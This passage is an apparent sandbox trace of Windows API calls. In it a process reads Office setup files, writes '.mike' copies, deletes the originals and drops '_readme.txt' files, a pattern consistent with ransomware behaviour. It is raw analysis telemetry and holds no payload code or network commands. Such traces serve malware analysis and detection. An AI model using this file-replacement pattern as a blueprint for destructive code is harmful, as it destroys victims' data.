ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0052.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.595] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.595] GetFileType (hFile=0x288) returned 0x1 [0052.595] GetFileType (hFile=0x288) returned 0x1 [0052.595] ReadFile (in: hFile=0x288, lpBuffer=0x21ef634, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21ef634*, lpNumberOfBytesRead=0x2af038*=0x8f8, lpOverlapped=0x0) returned 1 [0052.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.597] GetFileType (hFile=0x288) returned 0x1 [0052.597] GetFileType (hFile=0x288) returned 0x1 [0052.597] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.597] GetFileType (hFile=0x288) returned 0x1 [0052.597] GetFileType (hFile=0x288) returned 0x1 [0052.598] WriteFile (in: hFile=0x288, lpBuffer=0x21f8d60*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21f8d60*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a49460, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a49460, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20)) returned 1 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21fa6e0 | out: lpFileInformation=0x21fa6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a49460, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a49460, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20)) returned 1 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.599] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0052.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt", lpFilePart=0x0) returned 0x67 [0052.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.602] GetFileType (hFile=0x288) returned 0x1 [0052.602] GetFileType (hFile=0x288) returned 0x1 [0052.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpFilePart=0x0) returned 0x5b [0052.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\", lpFilePart=0x0) returned 0x5c [0052.603] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8a49460, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8a49460, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a23300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a23300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a23300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.XML.mike", cAlternateFileName="EXCELM~1.MIK")) returned 1 [0052.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a49460, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a49460, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a23300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a23300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.603] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a23300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a23300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a49460, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.604] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.604] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", lpFilePart=0x0) returned 0x5c [0052.604] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.604] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.604] CoTaskMemFree (pv=0x502980) [0052.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.604] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", lpFilePart=0x0) returned 0x5c [0052.604] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", lpFilePart=0x0) returned 0x5c [0052.604] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\", lpFilePart=0x0) returned 0x5d [0052.604] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.605] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.605] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.XML", cAlternateFileName="GROOVE~1.XML")) returned 1 [0052.605] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee803530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.606] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.606] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.606] GetFileType (hFile=0x288) returned 0x1 [0052.606] GetFileType (hFile=0x288) returned 0x1 [0052.606] CloseHandle (hObject=0x288) returned 1 [0052.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.607] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.607] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.607] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2201a8c | out: lpFileInformation=0x2201a8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.607] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2201e38 | out: lpFileInformation=0x2201e38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.607] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft 